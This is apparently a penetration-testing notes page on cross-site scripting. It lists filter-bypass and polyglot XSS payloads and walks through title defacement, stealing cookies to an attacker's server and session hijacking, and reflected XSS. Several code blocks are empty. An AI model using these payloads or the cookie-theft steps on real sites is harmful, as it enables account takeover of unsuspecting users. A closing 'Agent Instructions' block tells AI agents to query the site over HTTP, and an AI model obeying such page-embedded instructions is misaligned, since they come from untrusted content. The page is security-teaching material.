# XSS ### Payloads ```javascript # Standard XSS Payload # Input tag escape "> # Escape textarea tag # Escape Javascript code ';alert('XSS');// # Bypass filters that strip out malicious words such like "script" alert('XSS'); # Polygot payload (Can bypass multiple filters) jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('XSS') )//%0D%0A%0d%0a//\x3csVg/\x3e ``` ### Payload List {% embed url="" %} ## Stored XSS ### Defacing HTML Titles Stored XSS can allow opportunity to deface web applications through various methods. One such method may allow for HTML titles and elements to be changed. In the example below we will be altering the HTML title "XSS playground".
Firstly, we need to identify the Element ID for the title. Using the browser's inspector we can identify the Element ID where we can see the string: ``` XSS Playground" ``` As shown in the browser inspector:
The following payload can be used to alter the title. This payload can be inserted into the comment section on the web application. ``` ``` After the payload has been inserted we can see where the HTML title has now been changed.
### Payloads for changing Element ID ``` ``` ### Cookie Stealing Cookie stealing can be performed via Reflected and Stored XSS. With Stored XSS anyone who visits the affected web page can have their cookie sent to an adversary. This cookie can then be used to potentially log into the application as the victims user account. The script linked below is used to set up a HTTP server on the attackers machine which will catch cookies from an unsuspecting users browser session when they active the stored XSS. Script:
After the script has been downloaded alter the variables shown below to point back to the attacking system and then run the script with Python.
After the script is setup and running the attacker injects the Stored XSS payload as shown below onto the vulnerable web page. ``` ``` When the victim nexts visits the affected web page their cookie will be sent to the attacker.
Where the script receives the cookie:
The cookie is then placed into the attackers browser session.
After a page refresh by the adversary we see they are now logged in as the victim' s user account.
## Reflected XSS Reflected XSS "reflects" the injected script back to the victims browser through various methods such as search functions, forms and as part of script contained within a URL. Simple payload for proof of concept: ``` ``` The page shown below reflects the search query into the URL of the web application. Using the payload shown above we can see how this is reflected back on the web page.
From above we can also see how this affects the URL for the web page. ``` http:///reflected?keyword=%3Cscript%3Ealert%28%27Hello%27%29%3C%2Fscript%3E ``` ### Grabbing machine IP ``` ```
## Further Reading GitHub: --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/everything/everything-web/xss.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.